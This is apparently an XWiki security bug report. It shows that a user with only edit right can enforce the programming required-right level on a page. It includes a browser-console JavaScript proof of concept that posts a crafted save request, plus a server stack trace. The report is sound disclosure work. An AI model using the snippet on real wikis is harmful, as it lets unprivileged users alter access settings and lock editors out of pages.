Users with just edit right can enforce required rights with programming right

Steps to reproduce:

• Log in as a user with edit right on a page but no script, admin or programming right.
• Open a page on which required rights aren't enforced (currently, basically all pages) or on which just edit right is enforced.
• In the browser's console, execute the following snippet to enforce required rights with programming right: 

  const formData = {
      enforceRequiredRights: '1',
      form_token: document.documentElement.dataset.xwikiFormToken,
      'addedObjects': 'XWiki.RequiredRightClass_0',
      'XWiki.RequiredRightClass_0_level': 'programming'
  };
  const url = XWiki.currentDocument.getURL('save');
  fetch(url, {
      method: 'POST',
      headers: {
          'Content-Type': 'application/x-www-form-urlencoded'
      },
      body: new URLSearchParams(formData)
  }).then(response => {
      if (response.ok) {
          console.log('Page saved successfully with required rights and programming right enforced.');
      } else {
          console.error('Failed to save the page:', response.statusText);
      }
  }).catch(error => {
      console.error('Error:', error);
  }); 

Expected result:

An error is logged because a user without programming right shouldn't be able to enforce programming right. The user can still edit the page.

Actual result:

"Page saved successfully with required rights and programming right enforced." is displayed in the browsers log. The user cannot edit the page anymore.

In XWiki's log, the following error is logged:

2025-02-06 11:43:32,533 [qtp1667689440-70 - http://localhost:1700/xwiki/bin/save/Sandbox/] ERROR .o.i.DefaultObservationManager - Failed to send event [com.xpn.xwiki.internal.event.UserUpdatingDocumentEvent@3f6d7d88] to listener [org.xwiki.security.authorization.internal.RightsFilterListener@23987546] 
java.lang.NullPointerException: Cannot invoke "org.xwiki.model.EntityType.getLowerCase()" because the return value of "org.xwiki.security.authorization.requiredrights.DocumentRequiredRight.scope()" is null
        at org.xwiki.security.authorization.internal.RightsFilterListener.checkModifiedRequiredRights(RightsFilterListener.java:123)
        at org.xwiki.security.authorization.internal.RightsFilterListener.onEvent(RightsFilterListener.java:100)
        at org.xwiki.observation.internal.DefaultObservationManager.notify(DefaultObservationManager.java:338)
        at org.xwiki.observation.internal.DefaultObservationManager.notify(DefaultObservationManager.java:303)
        at com.xpn.xwiki.XWiki.checkSavingDocument(XWiki.java:1929)
        at com.xpn.xwiki.web.SaveAction.save(SaveAction.java:290)
        at com.xpn.xwiki.web.SaveAction.action(SaveAction.java:520)
        at com.xpn.xwiki.web.XWikiAction.execute(XWikiAction.java:635)
        at com.xpn.xwiki.web.XWikiAction.execute(XWikiAction.java:338)

The content of the page still doesn't have programming right, though, and when a user with programming right tries to edit the page and the page actually contains a Velocity macro, a warning is still displayed. Therefore, the actual impact of this security issue is relatively low.